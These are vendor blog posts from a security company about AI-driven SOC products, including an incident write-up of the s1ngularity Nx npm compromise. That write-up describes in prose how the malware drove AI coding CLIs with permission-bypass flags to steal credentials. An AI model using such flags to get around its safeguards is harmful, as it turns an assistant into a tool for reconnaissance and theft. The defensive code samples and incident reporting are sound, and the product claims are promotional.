  • Alert summarization across IP clusters to highlight coordinated or related activity.
  • Detailed remediation guidance to enable faster, more effective response without relying on external expertise.

Beyond just alert triage with full detection and context

When this customer connected their Okta tenant to Exaforce during onboarding, our platform immediately began behavioral analytics across identity, geo, ASN, and policy telemetry. Without custom rules, Exaforce detected a high-risk pattern: an admin-privileged service account signing in to Microsoft 365 from 40+ countries and 37+ distinct ASNs in compressed time windows, classic impossible travel plus infrastructure rotation.

Exaforce then auto-generated the finding, triaged it, and enriched it with analyst-ready context: why it matters (admin account, sensitive operations), what was observed (global spread, no matching safe VPN IPs), mapped MITRE tactic/technique (Initial Access → Valid Accounts), confidence level (High), and recommended investigation priority. All of the evidence, IP intelligence, event counts, and MFA-related actions were packaged in a single view, exportable as audit data or JSON.

The result: instead of starting from raw Okta logs and writing queries, the security team started from a high-confidence, fully scoped account-takeover investigation. This is the difference between alert noise and operational detection.

Want to see what Exaforce can do with your IdP data? We can show you what’s hiding in the data you already have. Schedule a demo to find out more.

August 27, 2025

s1ngularity supply chain attack: What happened & how Exaforce protected customers

How the s1ngularity attack exploited Nx packages and how Exaforce verified zero exposure.

On August 26, 2025, the npm registry was compromised, and multiple malicious versions of the highly prevalent Nx build system package (@nrwl/nx, nx, and related modules) were published. These versions contained a post-install script (telemetry.js) that silently executed on Linux and macOS systems. The payload stealthily harvested extremely sensitive developer assets such as cryptocurrency wallets, GitHub and npm tokens, SSH keys, and more.

The threat was especially insidious: the malware weaponized AI CLI tools (like Claude, Gemini, Q) using reckless flags (--dangerously-skip-permissions, --yolo, --trust-all-tools) to escalate reconnaissance and exfiltration. The stolen credentials and files were encoded (double- and triple-base64) and published to attacker-controlled GitHub repos, often named s1ngularity-repository, -0, or -1, making them publicly accessible.

GitHub moved swiftly, and on August 27, 2025 at 9 AM UTC, they disabled all known attacker-created repositories, but that was about 8 hours after the event.

Which versions were affected?

Affected packages include, but are not limited to:

  • @nrwl/nx, nx: versions 20.9.0, 20.10.0, 20.11.0, 20.12.0, 21.5.0, 21.6.0, 21.7.0, 21.8.0
  • @nx/devkit: 21.5.0, 20.9.0
  • @nx/enterprise-cloud: 3.2.0
  • @nx/eslint: 21.5.0
  • @nx/js: 21.5.0, 20.9.0
  • @nx/key: 3.2.0
  • @nx/node: 21.5.0, 20.9.0
  • @nx/workspace: 21.5.0, 20.9.0

The scope of the compromise was vast. In some cases, the malware ran on developer machines via the NX VSCode extension; in others, it was executed inside build pipelines, such as GitHub Actions.

What It Meant

This incident highlighted the devastating potential of modern, AI-empowered supply-chain attacks. By installing a trusted package, and without triggering obvious alarms, developers inadvertently exposed countless sensitive assets. With attacker repositories publicly exposed, the data leakage was real and tangible.

Exaforce’s response: Rapid and proactive

Assurance of no customer impact

Immediately upon learning of the attack, the Exaforce MDR team conducted proactive checks across its customer environments. The results were clear and reassuring:

  • No customers had installed any of the compromised Nx package versions.
  • No malicious repositories had been created or existed within any customer GitHub accounts, infrastructure, or pipelines.

This proactive verification meant that, to date, no customer has been impacted by this supply-chain compromise. We quickly informed customers via their preferred messaging platforms that the attack did not impact them.

Enhanced risk monitoring

To strengthen defenses against future supply-chain compromises, Exaforce has deployed a new Supply Chain Security risk rule. This rule continuously scans customer environments for suspicious repository patterns similar to those used in the recent @nrwl/nx compromise.

Specifically, it flags repositories matching the naming convention attackers used to publish exfiltrated secrets and stolen credentials. By surfacing these high-risk patterns early, the rule enables teams to quickly review, validate, and remove unauthorized repositories before they can be weaponized.

Exaforce risk rule to detect malicious repositories

Rapid and simple investigation

Exabot Search also allows analysts to quickly check for the potential impact of events like the Nx supply chain attack across your entire environment. You can search for IoCs with a query such as `Can you go through this blog about a github vulnerability: https://www.stepsecurity.io/blog/supply-chain-security-alert-popular-nx-build-system-package-compromised-with-data-stealing-malware. Please extract the indicators of compromise and tell me if i am impacted in my environment?`. Exabot Search will correlate events from different sources and return results in a structured, easy-to-read format. This reduces the time needed to determine whether an incident or new threat affects your systems.

See the workflow in the demo below:

Final thoughts

The s1ngularity incident is a sobering reminder of how modern threat actors are innovating with AI tools and exploiting supply-chain trust. Exaforce’s swift response, verifying zero customer exposure and proactively enhancing detection mechanisms, demonstrates how vigilance and responsive action can turn a potential disaster into a controlled event. By staying alert, preparing risk-based detection rules, and monitoring behaviors, not just packages, we ensure that even next-generation attacks are caught early.

August 26, 2025

Introducing Exaforce MDR: A Managed SOC That Runs on AI

An MDR service that uses agentic AI and expert analysts at every stage of the SOC lifecycle, so you get faster response, better coverage, and a SOC that understands your business.

Security operations today are caught in a painful paradox. For organizations without a Security Operations Center (SOC), building one from scratch is costly, time-consuming, and resource-intensive, requiring headcount and tooling that many simply can’t afford. For those that already have a SOC, the challenge shifts to scale: every new cloud service/tool or identity system you adopt adds sources to monitor, detections to maintain, and alerts to investigate. A survey found that 65% of analysts are at risk of churn due to burnout from existing SOC environments, putting institutional and technical knowledge at risk and leaving organizations more vulnerable to noise, blind spots, and missed threats. The result is the same whether you’re starting from zero or operating at scale.

Agentic MDR for any stage of maturity

With Exaforce’s Managed Detection and Response (MDR) service, we’re addressing both ends of that spectrum. Built on our full-lifecycle Agentic SOC platform, MDR brings AI-powered detection, triage, investigation, and response to customers in days, not months. For teams without a SOC, it delivers 24/7 monitoring, response, and tailored protection without the need to hire an in-house team. For established SOCs, it acts as a force multiplier, absorbing noise, filling coverage gaps, and freeing analysts to focus on the incidents that matter. By combining our AI agents, called “Exabots,” with experienced analysts, we’ve created an MDR that is always on and responds faster, where the handoff between human and machine is seamless and the learning curve is virtually eliminated.

Closing the MDR context and coverage gaps

Most MDRs face two persistent challenges: they drown in false positives and lack the business context needed to separate routine activity from real threats. Exaforce eliminates both. From day one, our Exabots ingest your environment’s configurations, identities, and past alerts, so the platform understands full historical context and provides that to our analysts. This way, they know not just what’s unusual, but what’s unusual for you, and that knowledge is retained and passed forward.

We also expand coverage to blind spots SIEMs often miss, such as source code management systems like GitHub and collaboration platforms like Google Workspace. Our MDR analysts are trained in these systems and know how to follow up effectively, ensuring overlooked attack surfaces don’t become the weak link.

Smarter triage and deeper investigations

Every alert, whether from Exaforce detections, your cloud tools, or a third-party SIEM, is triaged with AI-driven reasoning. False positives are removed, signals are enriched with identity and behavioral context, and only high-confidence alerts reach our analysts. This reduces noise for customers and frees our team to focus on the incidents that matter.

When investigations are needed, Exaforce accelerates them with automated evidence gathering, contextual linking across identities and systems, and powerful data exploration for threat hunting. Analysts can quickly build timelines, trace attacker behaviors, and guide containment in minutes instead of hours, leading to faster, more confident responses.

Response that’s tailored, transparent, and fast

Speed isn’t our only advantage. We partner closely with each customer to tailor protections to their priorities. Our Exabots confirm suspicious activity directly with end users via Slack or Microsoft Teams, loop in managers when needed, and even automate actions like password resets, MFA resets, or session terminations through integrations with your identity provider. Whether handled by a human in the loop or executed autonomously by Exabot, every action is backed by context, transparency, and accountability. Customers also have full access to the underlying Exaforce platform at all times to see what we see, making it easy to have informed conversations about security posture and continuous improvement.

Bringing world-class SOC capabilities to everyone

Because our MDR is AI-enabled at every step, it’s not limited to enterprises with deep pockets and large teams. We’re democratizing access to world-class SOC capabilities for companies of all sizes. Now, even a small team can have around-the-clock protection and the confidence that someone is “watching the store” while reclaiming critical time to focus on key business needs. And for larger teams, MDR becomes a way to absorb the operational load without losing control over strategy, visibility, and transparency.

Ready in a day, delivering value immediately

With Exaforce MDR, you’re not getting an expensive notification service that dumps alerts back into your queue. You’re getting a partner that investigates, contextualizes, and responds better, faster, and with a depth of understanding that feels like we’re sitting next to you. We’re easy to onboard, and can start delivering value within the same day. The only thing left for you to decide is what you’ll do with the time and peace of mind you get back.

Want to learn more? Talk to an MDR specialist today.

August 26, 2025

Meet Exaforce: The full-lifecycle AI SOC platform

Launching the Exaforce agentic AI SOC platform: full-lifecycle security operations with automated detection, triage, investigation, and response. Empower small teams to create a SOC or enable mature SOCs to scale coverage and speed without increasing headcount

For many organizations, building and running a Security Operations Center (SOC) presents an impossible choice. If you’re a small, nimble security team setting up your program, you can invest heavily in tools and hire detection engineers and analysts, or outsource entirely to an MSSP/MDR. Both options have trade-offs: one demands headcount and tooling you may not have, the other surrenders control with unclear outcomes. If you already have a SOC, the challenge is different but just as pressing. Every new service or cloud workload you deploy adds sources to monitor, detections to maintain, and alerts to investigate, and you’re unlikely to get the budget to match this increase with headcount. The result is blind spots, missed alerts, and analyst burnout.

We believe there’s a better way. After founding Exaforce, we set out to build a full-lifecycle AI SOC platform, bringing agentic AI to every stage of security operations, including threat detection, alert triage, investigation & threat hunting, and response. Available as a SaaS platform or a fully managed MDR service, Exaforce is designed to help teams work faster, more accurately, with greater confidence, and with much lower TCO compared to traditional SOC tooling and services.

Why a full-lifecycle AI SOC matters

Today’s security operations tools, even those attempting to bolt on AI capabilities, were not built for modern IaaS, SaaS, identity, and AI-workload attack surfaces. Stitching together signals from modern application stacks takes time and expertise most SOCs can’t spare, especially smaller teams getting started or mature SOCs already stretched thin.

Exaforce solves this with Exabots, task-specific AI agents, and an Advanced Data Explorer. Exabots operate in autopilot or copilot mode, augmenting all critical SOC tasks. The Advanced Data Explorer empowers SOC teams to easily query and investigate beyond traditional SIEM event data, combining logs, identity, configuration, code context, and threat intelligence data, and makes it available through natural language queries or a Business Intelligence-like interface with filters and charts. This modern architecture, combined with the data engineering and transformation work we are doing, significantly reduces storage costs for IaaS and SaaS logs that account for the majority of log volume in modern environments. Both capabilities are powered by a purpose-built multi-model AI engine blending deep learning, machine learning, knowledge graphs, and LLMs for comprehensive reasoning.

The result is high-accuracy detections, context-rich triage, and accelerated investigations, helping smaller teams launch a capable SOC in hours and enabling mature SOCs to operate faster and more accurately, all while reducing total cost of ownership (TCO).

Exaforce’s multi-model AI that powers the platform

Detect and stop more cloud threats

Exaforce delivers out of the box threat detections across critical IaaS, SaaS, and identity environments. We cover AWS, GCP, Google Workspace, GitHub, Atlassian, OpenAI, and more that go beyond UEBA techniques.

Building effective UEBA and anomaly detection using legacy tooling is no small task. It requires a deep understanding of the services you are protecting and pertinent entities to model accurate detections. Most large enterprises attempting to do this well staff entire teams of detection engineers and data scientists. Even still, existing anomaly detection and UEBA approaches weren't built for cloud identities and resources, and tend to generate excessive false positives. 

Exaforce instead combines advanced anomaly detection with LLM reasoning capabilities. Anomalies become "interesting signals" that LLMs stitch together with business context and reasoning specific to a customer's environment. Exabot can reason with configuration data, code repositories, identities, and threat intelligence, not just event data.

The result is highly accurate, actionable threat detections that provide coverage for even the smallest SOC teams and fill blind spots for mature SOC teams grappling with the ever-growing number of new services they have to monitor.

A threat finding correlated across IdP and SaaS services, showing potential account compromise with data exfiltration

Automated triage beyond Tier 1 analysis

When alerts arrive from Exaforce detections, cloud-native tools, or your SIEM, Exabot Triage performs investigations that go far beyond typical Tier 1 analysis. Unlike traditional triage that relies on point-in-time events, Exabots leverage deep environment knowledge and our anomaly detection engine to reason about behavior over time.

Exabots correlate threats across multiple detection sources. They create complete attack narratives that would otherwise appear as isolated alerts. Each investigation enriches alerts with identity context, peer baselines, and historical outcomes before issuing clear verdicts of False Positive or Needs Investigation.

When users hold the most accurate context, Exabots reach out directly. This saves countless hours of manual verification that plagues most SOC teams. Natural-language Business Context Rules capture your business priorities, fine-tuning AI analysis with knowledge bespoke to your environment, reducing false positives for activity considered normal in your environment.  

When performing these actions, Exabots operate in autopilot or copilot modes. Analysts can review the analysis while asking follow-up questions, all within the same platform. No context switching to SIEM is required to retrieve additional information to aid in an investigation.

Exaforce auto-triaging a third-party alert based on the added context directly from the source and history

Faster investigations and threat hunting

In most SOCs, investigations face a fundamental data problem. Without a SIEM, security teams search across multiple data sources with different retention policies, resulting in insufficient data to conduct an investigation and the daunting task of stitching information together when the data is available. With a SIEM, they're limited to event data and must write complex queries to answer basic questions such as which entity performed what actions, and what was the impact.

Exaforce's Advanced Data Explorer goes beyond traditional SIEMs. It unifies events, identity, configuration, code context, and threat intelligence with rich relationships in a purpose-built user experience. The data is queryable via natural language search or through a business intelligence-like interface that enables true data discovery and visual querying. The data is stored in a fast in-memory database that enables real-time investigations, while a data warehouse supports longer-term analysis.

Business intelligence-grade investigation view, making it easy to filter to relevant sessions and details

Similarly, threat hunting becomes effortless using the data explorer and Exabot Search. For example, you can ask Exabot Search to retrieve information on known exploits from the web, prompt the system to extract indicators of compromise, then search for those indicators across your entire environment, all via natural language.

Exabot Search makes threat hunting as easy as asking questions in natural language and it does the hard work of querying complex data
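
To make that concrete, here is a minimal sketch of the pattern Exabot Search automates, not our implementation: pull candidate IOCs out of an exploit write-up with simple regexes, then check them against your own logs. The write-up text and log lines below are hypothetical.

import re

# Hypothetical exploit write-up; in practice Exabot Search
# retrieves this kind of content from the web for you.
writeup = """
The campaign used C2 servers at 203.0.113.7 and 198.51.100.42,
dropping a payload with SHA-256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855.
"""

IP_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
SHA256_RE = re.compile(r"\b[a-fA-F0-9]{64}\b")

def extract_iocs(text: str) -> set[str]:
    """Pull candidate indicators of compromise out of free text."""
    return set(IP_RE.findall(text)) | set(SHA256_RE.findall(text))

def hunt(iocs: set[str], log_lines: list[str]) -> list[str]:
    """Return any log lines that mention a known-bad indicator."""
    return [line for line in log_lines if any(ioc in line for ioc in iocs)]

logs = ["2025-06-01 login ok src=10.0.0.5",
        "2025-06-01 outbound conn dst=203.0.113.7"]
print(hunt(extract_iocs(writeup), logs))  # flags the 203.0.113.7 line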

By combining Advanced Data Explorer with Exabot Search, teams overcome traditional investigation barriers and gain visibility beyond what a SIEM can deliver.

End-to-end response workflows

Exaforce goes beyond ticket creation, integrating with Slack and Teams to confirm activity with users and managers, and with identity providers like Entra ID to automate password resets, MFA resets, or session terminations. Analysts can respond manually or allow Exabot to act autonomously, saving precious analyst time.
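
For illustration, here is a minimal sketch of the kind of containment action described above, using Microsoft Graph's revokeSignInSessions endpoint to invalidate a user's refresh tokens. Token acquisition and the user ID are placeholders, and our production integration handles far more than this.

import requests

GRAPH = "https://graph.microsoft.com/v1.0"

def revoke_sessions(user_id: str, access_token: str) -> bool:
    """Invalidate all refresh tokens for a user, forcing re-authentication.

    Uses Microsoft Graph's revokeSignInSessions action; the caller must
    hold a token with permission to update users (e.g. User.ReadWrite.All).
    Acquiring that token is out of scope for this sketch.
    """
    resp = requests.post(
        f"{GRAPH}/users/{user_id}/revokeSignInSessions",
        headers={"Authorization": f"Bearer {access_token}"},
        timeout=30,
    )
    resp.raise_for_status()
    # Graph returns a boolean body, e.g. {"value": true}, on success.
    return resp.json().get("value", False)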

Every case is automatically populated with the related findings, resources, and sessions, so context flows seamlessly from detection to action. Built-in case management and two-way sync with ticketing systems like Jira keep collaboration smooth and reduce handoff delays, accelerating containment and remediation.

Exaforce integration with Entra ID to automate MFA and password resets directly from a finding

Proactive risk management

Security is also about preventing threats, and the posture of an asset can assist in the investigation of an alert. Exaforce continuously assesses posture risks across identities, cloud resources, and SaaS applications, such as misconfiguration risks and unused permissions. These insights highlight the highest-impact risks so teams can act before attackers exploit them. The same posture context is fed into threat detections and strengthens the alert triage and investigations done by Exabots, improving accuracy and prioritization.

View of prioritized risk findings across data sources

Get started with Exaforce

Our mission is to boost SOC productivity and accuracy by 10x with AI, helping small teams stand up a world-class SOC without friction and enabling existing teams to scale coverage, speed, and quality of detection and responses without scaling headcount.

Whether you want to augment an existing SOC, build one from scratch, or offload operations with MDR, Exaforce brings agentic AI to the entire security operations lifecycle, not just Tier-1 workflows. Request a demo to see how quickly you can go live and close the loop from detection to response.

August 21, 2025

Building trust at Exaforce: Our journey through security and compliance

How Exaforce made trust a launch requirement by embedding security and compliance from day one

Why compliance matters

Let’s face it, most startups treat compliance like airplane wings; they build the whole plane, get ready for takeoff, then realize they need to bolt them on while already rolling down the runway.

We took a different path.

From day zero, compliance was part of the blueprint. While engineering built our Agentic SOC platform, the entire company worked hand in hand to ensure our security, governance, and operational practices were aligned with the most rigorous standards like SOC 2. Compliance was ingrained from the start, woven directly into how the platform was architected and how we operate every day.

Our earliest design partners came from the front lines of regulated industries: healthcare, finance, and life sciences. These weren’t just logo-chasing partnerships. They were formative relationships that shaped our platform’s core features. And if we wanted them to stick around and trust us, we had to speak their language: compliance.

So we got to work. No shortcuts. No delayed timelines. Just a stubborn commitment to doing things right, from the start.

Fast forward: we’ve now locked in SOC 2 Type I & II, ISO 27001, PCI DSS, HIPAA, GDPR, and USDP. And we’re in mid-observation for HITRUST e1. And the best part? We hit many of these milestones ahead of schedule.

This is a startup survival guide told by the guy who wrote every policy, chased every screenshot, and occasionally bribed engineers with craft beer to hit compliance deadlines.

Our vision: Compliance by design

Before the first customer onboarded. Before the first alert fired. Before our platform even launched, we were already building with compliance in mind.

Why? Because we wanted to:

  • Enable regulated industries to adopt Exaforce from day one.
  • Create enterprise-grade trust in our platform and company.
  • Bake security and governance into our architecture, not bolt it on later.

We aligned early with cloud-native frameworks like SOC 2 and ISO 27001, while preparing for partner-driven frameworks such as USDP, GDPR, HIPAA, and HITRUST.

The roadmap: From zero to certified

Our certification timeline

The leadership behind the mission

"Compliance isn't just a milestone. It's a mindset. It's how we operate."
— Team Exaforce

We don't treat compliance as a checkbox, nor is it the responsibility of a single person or department. It's a company-wide principle, woven into our culture of openness, agility, and transparency.

From day one, our leadership team committed to integrating security and compliance directly into our operational DNA. But the real strength of our program comes from our people: engineers, SREs, product leads, operations, and business teams who consistently go beyond expectations. Whether it is adjusting deployment pipelines, reworking onboarding flows, or documenting new processes, everyone leans in.

Collaboration as our foundation

Rather than compliance being enforced from the top down, it became a shared initiative. This unique culture meant that when compliance controls required change, the conversation wasn’t about resistance; it was about how to make it work faster, better, and cleaner. We strove to not only meet the bar but also to iterate on how it could be raised without adding unnecessary friction.

We partnered with well-known, trusted industry experts for audits, assessments, and risk validation. Their guidance helped us refine our approach, confirm we were meeting the highest standards, and challenge us to raise the bar even further. Combined with our internal expertise, this collaboration allowed us to build a program that’s both audit-ready and operationally seamless.

Platforms that powered the process

To scale and automate compliance in a fast-moving startup, we leaned into a robust and cloud-native toolset. We built our compliance foundation on proven, cloud-native platforms for policy management, automation, and access control, the same kinds of tools used by leading enterprises. These systems gave us a single source of truth for evidence, automated monitoring of controls, and streamlined onboarding and offboarding.

But the most important platform in the mix was our own. We used the Exaforce Agentic SOC Platform internally to detect, triage, and investigate anomalous activity, not just for security, but to meet and validate compliance controls in real time. We proved that the capabilities we deliver to customers can stand up to the same scrutiny we face ourselves.

“We drank our own champagne. Our platform wasn’t just built for others, we used it internally to prove it works.”
— Team Exaforce

Embedded into operations

By leveraging our stack and working as one team, compliance became an ongoing habit, rather than a quarterly panic. Tasks are tracked automatically. Alerts are triaged through Slack. Access reviews are visible and documented. When an audit request comes in, we already have the evidence.

This embedded model is what makes Exaforce different. We treat compliance as a competitive edge, a trust enabler, and an extension of our platform's mission to make cloud security more intelligent.

Lessons from the trenches

Real challenge: No access = No evidence

Because we operate under least privilege access, there were many times I didn’t have direct access to the systems I needed evidence from. Chasing SREs during crunch time? Let’s just say I had to get creative, offering bribes (beer) or joking about dire consequences!

Biggest win: No audit findings

When auditors returned clean reports (no findings, no changes, no redo), that was a moment of deep pride. Another highlight: beating internal certification deadlines despite product sprint pressure.

Cultural shift

Convincing a fast-moving startup team to complete onboarding, read policies, and watch training videos wasn’t easy. But today, compliance is just something our team does—and that mindset is a win.

Building a culture of compliance

At Exaforce, compliance is a mindset woven into every layer of how we operate. Our approach blends automation, culture, and accountability. Every new team member completes training videos and policy acknowledgments in their first week, automatically tracked in Vanta and reinforced through onboarding flows in GitHub. Slack-integrated bots and emails deliver timely reminders for compliance tasks, gently guiding staff toward full alignment without interrupting productivity. Our engineering culture prioritizes secure coding practices, internal peer reviews, and approvals of policies and architecture. Finally, exits are managed with the same precision as entries, ensuring no loose ends across systems or access.

These are deep operational habits. And when auditors come knocking, the difference between our compliance culture and surface-level efforts is clear.

Drinking our own champagne: Agentic AI at work

We use our own Agentic SOC Platform internally for detection, triage, and alerts. This has the double benefit of learning from our own use and providing real operational value.

Example 1: Dormant account reactivation

Our system caught a dormant user in a design partner’s account suddenly becoming active. It turned out to be a contractor account that should have been disabled. We escalated and helped them shut it down before anything major happened. Because we enforce the same compliance processes internally, our platform flags similar situations for us.

Example 2: Brute-force login attempts

For another partner, we flagged suspicious activity across multiple accounts. The first time, they disabled the account. The second time, they revamped their MFA policies. Detections like these help fulfill several compliance controls.

That’s the power of an agentic AI SOC platform built to cover detections, triaging, investigations, and response.

Value delivered before launch

Compliance was always a launchpad for us. Before we even shipped our product, our security posture was already opening doors. Here's what it meant in practice:

Frictionless security reviews
We cleared complex vendor assessments early, turning red flags into green lights for our design partners and prospects.

Accelerated procurement cycles
Buyers saw a mature, secure partner, not a startup with "coming soon" promises.

Stronger first impressions
Our Security Trust Center impressed stakeholders and showed how seriously we take the protection of their data.

Built-in buyer confidence
Compliance gave us credibility, even in regulated industries, from day one.

By integrating security and compliance into our go-to-market motion, we didn’t just meet expectations — we exceeded them before launch.

Looking ahead

Our commitment to trust and transparency continues to evolve beyond our initial certifications. Next on our roadmap are advanced frameworks like ISO 27017, ISO 27018, and the ambitious FedRAMP program. We’re investing in smarter, more scalable ways to maintain compliance, reducing manual overhead while increasing reliability, and building a unified, public-facing hub where customers and partners can access our policies, certifications, and security posture at any time.

Final thoughts

If you’re a CISO, compliance lead, or security-conscious buyer, we built this for you. Exaforce is a compliant, intelligent, and trust-first cloud security partner.

We took the hard road first so our customers could go fast later.

Let’s secure the future together.

August 7, 2025

Fixing the broken alert triage process with more signal and less noise

A look at how AI is changing the SOC triage process from automated false positive classification to clearer handoffs and deeper context for Tier 2 and 3 analysts.

A day in the life of a SOC analyst on triage duty

Imagine starting your workday faced with a barrage of security alerts, each signaling a potential threat to your organization's data and systems, but only if you can find the needle in the haystack of findings. As a triage analyst, your first task is to monitor incoming alerts from security information and event management (SIEM) systems, endpoint detection and response (EDR), intrusion detection systems (IDS), email security, and more. And those are just the security tools. As an analyst, you should also dig into the raw logs from network tools, identity providers, and more. Visibility across endpoints, networks, cloud platforms, and SaaS applications is critical, yet managing this extensive data can be overwhelming.

Depiction of triaging in a simplified SOC scenario

After intake, the initial review is essential. Analysts spend a considerable amount of their time verifying alerts to filter out false positives, confirming log sufficiency, and ensuring quality evidence for deeper investigations. Prioritization follows, classifying each alert by severity (critical, high, medium, or low) and priority based on urgency, impact, and asset sensitivity.

Enriching these alerts through additional context and correlation is another time-intensive step. Analysts must gather more information from various systems and logs, cross-reference affected entities against known user behavior or prior incidents, and identify patterns that indicate larger attack campaigns or benign events like the CEO traveling. This process can be tedious and error-prone due to disconnected tools and inconsistent data formats.

Incident classification, basic response, containment, and escalation require meticulous documentation and clear communication among teams. Ensuring a smooth handoff between Level 1 analysts performing initial triage and advanced Level 2 or 3 analysts is often a challenge in traditional SOC processes. Most often, AI is used to automate repetitive Tier 1 work; however, significant bottlenecks and stress arise from alert escalation to Tier 2 or Tier 3 analysts, where a lack of expertise and insufficient data lead to poor contextualization.

Challenges facing triage analysis today

Triage analysts face several persistent challenges that hinder their efficiency and effectiveness. Existing solutions (SIEMs, SOARs, etc.) are not designed to handle these challenges, instead exacerbating the situation by becoming increasingly noisy and rigid:

  • High false positive rate wastes time: Tier 1s must wade through alerts that are often irrelevant, up to 99% in some cases, leading to alert fatigue and time loss.
  • Fragmented tools make triaging and enrichment slow and manual: Tier 1 analysts must piece together context from disconnected security and non-security systems, correlating logs, enriching alerts, and investigating manually, all of which slows response and increases error rates.
  • Unrealistic skill demands on junior analysts: Triaging often spans cloud, identity, endpoint, Kubernetes, SaaS, and more, requiring broad technical knowledge that's hard to expect from entry-level talent.
  • Lack of feedback stifles improvements: Without feedback from downstream teams or visibility into case outcomes, Tier 1 analysts struggle to improve accuracy over time. Similarly, Tier 1 analysts can struggle to provide quality feedback upstream to improve detections for fear of not providing good or accurate analysis.
  • Increased pressure from understaffed teams: Staffing gaps push more alerts onto fewer shoulders, compounding all of the above issues. For many organizations, this alone can push having a SOC out of reach.

Challenges across the triage process break down the expected model

These challenges underscore the critical need for a more streamlined, intelligent approach to triaging alerts in the SOC, not just for the high-volume, routine work of Tier 1, but for the tough, often-escalated cases that traditionally land with Tier 2 and Tier 3.

Transforming triage with AI-powered automation

Recent advancements in AI (GenAI and ML) create an opportunity to fundamentally change the triage process and the role of analysts in triaging. We built Exaforce from the ground up to leverage these advancements to improve the whole SOC lifecycle, including the triage, investigation, and response processes.

Reducing noise with automatic false positive reduction

Exaforce reduces noise faced by analysts by automatically identifying and marking false positives. It integrates logs, configurations, identities, threat intelligence feeds, and even code repository configurations to provide highly accurate initial analysis. Leveraging multiple AI techniques, Exaforce can further reduce the alert volume by deduplicating like alerts and chaining related findings, even across systems and tools.

Attack Chains string together alerts from different sources into one full story
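
As a toy illustration of the deduplication idea (not our actual algorithm), alerts can be fingerprinted on the fields that make two alerts "the same" and collapsed before triage; the field names here are hypothetical.

from typing import Any

def fingerprint(alert: dict[str, Any]) -> tuple:
    """Key an alert on the fields that make two alerts duplicates.

    The field choice (rule, principal, resource) is illustrative; a real
    system would tune this per alert type and add a time bucket.
    """
    return (alert["rule"], alert["principal"], alert["resource"])

def deduplicate(alerts: list[dict[str, Any]]) -> list[dict[str, Any]]:
    """Collapse duplicate alerts, keeping a count on the survivor."""
    groups: dict[tuple, dict[str, Any]] = {}
    for alert in alerts:
        key = fingerprint(alert)
        if key in groups:
            groups[key]["count"] += 1
        else:
            groups[key] = {**alert, "count": 1}
    return list(groups.values())

alerts = [
    {"rule": "GuardDuty:Recon", "principal": "svc-ci", "resource": "vpc-1"},
    {"rule": "GuardDuty:Recon", "principal": "svc-ci", "resource": "vpc-1"},
    {"rule": "Okta:MFA-deny", "principal": "jdoe", "resource": "okta"},
]
print(len(deduplicate(alerts)))  # 2: the duplicate recon alerts collapse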

Analysts receive clear summaries outlining the reasoning behind each decision, covering details about the principal, the user's and entity's locations, all actions taken during the session, details about the resource, and deep behavioral analysis of the user and their peers. For example, when AWS GuardDuty flags suspicious user activity, Exaforce's triage agent evaluates multiple indicators, such as user identity, session details, the user's location, and resource naming conventions, to discern whether it's a genuine threat or a benign event such as a test scenario.

AWS GuardDuty alert that was automatically triaged and marked as a false positive based on user analysis

Quick workflows with automated human-in-the-loop

This is where Exaforce, as an integrated platform, blurs the lines between triage and response. Exaforce automates analyst workflows through integrated channels like Slack to quickly confirm suspicious behaviors directly with users and managers. This reduces analyst burdens significantly, eliminating manual investigative tasks for straightforward confirmations, accelerating response times, and allowing analysts to concentrate on more complex issues.

Automated workflow confirmed with a user and their manager that suspicious activity was safe

Continuous learning and contextual customization

Exaforce learns continuously by incorporating historical context and analyst feedback. When an alert first tagged “Needs Investigation” is later cleared as a “False Positive,” that outcome becomes part of the context for all subsequent alerts’ analysis, refining how future alerts are scored. The engine also cross‑references the outcomes of similar alerts, even those that ultimately kept their original resolution, to give every new alert a richer, context‑aware assessment.

Organizations can also add customized Business Context Rules directly into the platform, tailoring the triage and response processes specifically to their operational and risk profiles, resulting in increasingly accurate and relevant threat detection. For example, at a leading biotechnology provider, the business context includes a list of known-safe VPN gateway IPs. When users switch between these IPs, such as between corporate VPN gateways, Exabots recognize this behavior as expected, rather than flagging it as impossible travel, reducing false positives without compromising detection fidelity.

Business Context Rules are natural language details about your environment used during triage analysis
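
To show the mechanics in miniature: Exabots evaluate these rules with LLM reasoning over natural language, but the effect of a known-safe gateway rule is roughly what this hard-coded sketch does, suppressing impossible-travel findings when both observed IPs are sanctioned VPN exits. The ranges below are documentation addresses, not real customer data.

import ipaddress

# Stand-in for a natural-language Business Context Rule such as:
# "Traffic from 198.51.100.0/28 and 203.0.113.0/28 is our corporate VPN."
KNOWN_SAFE_GATEWAYS = [
    ipaddress.ip_network("198.51.100.0/28"),
    ipaddress.ip_network("203.0.113.0/28"),
]

def is_known_gateway(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in KNOWN_SAFE_GATEWAYS)

def suppress_impossible_travel(src_ip: str, dst_ip: str) -> bool:
    """Suppress the finding when both observed IPs are corporate VPN exits.

    A jump between two sanctioned gateways is expected behavior, not
    impossible travel, so it should never reach an analyst.
    """
    return is_known_gateway(src_ip) and is_known_gateway(dst_ip)

print(suppress_impossible_travel("198.51.100.3", "203.0.113.9"))  # True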

Enhanced alert contextualization and investigation

Exaforce automatically enriches alerts by correlating context across sessions and systems, answering critical investigation questions that typically require expert analysts with knowledge spanning security, cloud, DevOps, endpoints, and more. This allows it to deeply contextualize any alert across IaaS services like EKS, SaaS services like Google Drive, and version control systems like GitHub, in a way that only an expert in the field could. All of this is summarized in highly digestible form, while the data behind the summaries remains available when the alert is passed on to the investigation team. This significantly simplifies and accelerates the investigation of alerts that aren't automatically triaged.

Detailed questions and answers behind the automated analysis

Empowering teams of all sizes

Exaforce democratizes advanced SOC capabilities, empowering even understaffed or smaller teams to achieve high-level security operations. Automating complex triage processes eliminates much of the burden on Tier 1 analysts and unblocks the rest of the SOC process. Through this, Exaforce allows organizations with or without dedicated SOC teams to maintain robust, proactive security postures.

Leveraging AI, the whole triage process can be improved

Triaging, without the turmoil

Triage shouldn’t be the most tedious part of a SOC analyst’s job, but today, it often is. High false positive rates, time-consuming investigations, fragmented tools, and broken feedback loops make it hard for Tier 1 through Tier 3 analysts to work efficiently or improve outcomes over time. And with handoffs between tiers introducing delays and inconsistencies, even the best triage efforts can break down before real response begins.

